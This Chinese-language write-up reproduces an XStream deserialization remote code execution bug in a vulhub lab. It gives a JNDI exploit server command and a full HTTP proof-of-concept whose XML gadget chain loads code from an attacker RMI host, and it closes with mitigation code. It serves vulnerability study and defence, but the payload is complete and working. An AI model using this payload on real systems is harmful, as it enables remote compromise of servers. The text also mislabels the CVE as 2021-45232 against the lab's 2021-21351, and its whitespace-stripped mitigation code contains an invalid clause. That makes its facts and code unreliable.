XStream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。
在 1.4.16 版本之前的 XStream 中,存在反序列化远程代码执行漏洞,漏洞编号为CVE-2021-45232,漏洞等级:高危。该漏洞允许远程攻击者操纵已处理的输入流并替换或注入对象,从而执行从远程服务器加载的任意代码。
XStream<=1.4.15
本次使用vulhub搭建本地测试环境进行复现:
第一步,执行以下命令,将vulhub环境拉取到本地。
git clone https://github.com/vulhub/vulhub
第二步,执行以下命令,启动服务。
cd vulhub-master/xstream/CVE-2021-21351docker-compose up -d
第三步,执行docker ps命令查看容器运行状况
第四步,访问http://your-ip:8080即可看到目标页面。
第五步,向http://your-ip:8080发送一个正常的XML数据包,将会得到预期返回:
<?xml version="1.0" encoding="UTF-8" ?><user> <name>Bob</name> <age>18</age></user>
https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
使用该辅助工具启动恶意JNDI服务器:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/success" -A 192.168.150.191
方框所选的是基于SpringBoot漏洞利用工具的RMI地址:
rmi://192.168.150.191:1099/debtks
使用基于SpringBoot利用链的RMI地址作为<dataSource>的值,构造POC如下:
POST / HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: application/xmlContent-Length: 3184
<sorted-set> <javax.naming.ldap.Rdn_-RdnEntry> <type>ysomap</type> <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'> <m__DTMXRTreeFrag> <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'> <m__size>-10086</m__size> <m__mgrDefault> <__overrideDefaultParser>false</__overrideDefaultParser> <m__incremental>false</m__incremental> <m__source__location>false</m__source__location> <m__dtms> <null/> </m__dtms> <m__defaultHandler/> </m__mgrDefault> <m__shouldStripWS>false</m__shouldStripWS> <m__indexing>false</m__indexing> <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'> <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'> <javax.sql.rowset.BaseRowSet> <default> <concurrency>1008</concurrency> <escapeProcessing>true</escapeProcessing> <fetchDir>1000</fetchDir> <fetchSize>0</fetchSize> <isolation>2</isolation> <maxFieldSize>0</maxFieldSize> <maxRows>0</maxRows> <queryTimeout>0</queryTimeout> <readOnly>true</readOnly> <rowSetType>1004</rowSetType> <showDeleted>false</showDeleted> <dataSource>rmi://evil-ip:1099/example</dataSource> <listeners/> <params/> </default> </javax.sql.rowset.BaseRowSet> <com.sun.rowset.JdbcRowSetImpl> <default/> </com.sun.rowset.JdbcRowSetImpl> </fPullParserConfig> <fConfigSetInput> <class>com.sun.rowset.JdbcRowSetImpl</class> <name>setAutoCommit</name> <parameter-types> <class>boolean</class> </parameter-types> </fConfigSetInput> <fConfigParse reference='../fConfigSetInput'/> <fParseInProgress>false</fParseInProgress> </m__incrementalSAXSource> <m__walker> <nextIsRaw>false</nextIsRaw> </m__walker> <m__endDocumentOccured>false</m__endDocumentOccured> <m__idAttributes/> <m__textPendingStart>-1</m__textPendingStart> <m__useSourceLocationProperty>false</m__useSourceLocationProperty> <m__pastFirstElement>false</m__pastFirstElement> </m__dtm> <m__dtmIdentity>1</m__dtmIdentity> </m__DTMXRTreeFrag> <m__dtmRoot>1</m__dtmRoot> <m__allowRelease>false</m__allowRelease> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>ysomap</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>test</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry></sorted-set>
执行成功可以查看攻击机上日志,如下图所示:
进入目标容器内,可见“touch /tmp/success”命令已成功执行:
1.配置XStream的安全框架为允许的类型使用白名单
XStream xstream= new XStream();XStream.setupDefaultSecurity(xstream);// 添加您允许的类型,在此处输入层次结构或包
2.注册自己的转换器,以防止解组当前已知的Java运行时关键类型
xstream.registerConverter(newConverter() {publicbooleancanConvert(Classtype) {returntype!=null&&(type==java.beans.EventHandler.class||type==java.lang.ProcessBuilder.class||type==java.lang.Void.class||void.class||type.getName().equals("javax.imageio.ImageIO$ContainsFilter") ||type.getName().equals("sun.awt.datatransfer.DataTransferer$IndexOrderComparator") ||type.getName().equals("com.sun.corba.se.impl.activation.ServerTableEntry") ||type.getName().equals("com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator")||type.getName().matches("javafx\\.collections\\.ObservableList\\$.*") ||type.getName().matches(".*\\$ServiceNameIterator") ||type.getName().matches(".*\\$GetterSetterReflection") ||type.getName().matches(".*\\$LazyIterator") ||type.getName().matches(".*\\.bcel\\..*\\.util\\.ClassLoader")||java.io.InputStream.class.isAssignableFrom(type) ||java.nio.channels.Channel.isAssignableFrom(type) ||javax.activation.DataSource.isAssignableFrom(type) ||javax.sql.rowset.BaseRowSet.isAssignableFrom(type)||Proxy.isProxy(type));}publicObjectunmarshal(HierarchicalStreamReaderreader, UnmarshallingContextcontext) {thrownewConversionException("Unsupported type due to security reasons.");}publicvoidmarshal(Objectsource, HierarchicalStreamWriterwriter, MarshallingContextcontext) {thrownewConversionException("Unsupported type due to security reasons.");}}, XStream.PRIORITY_VERY_HIGH);
还没有评论,来说两句吧...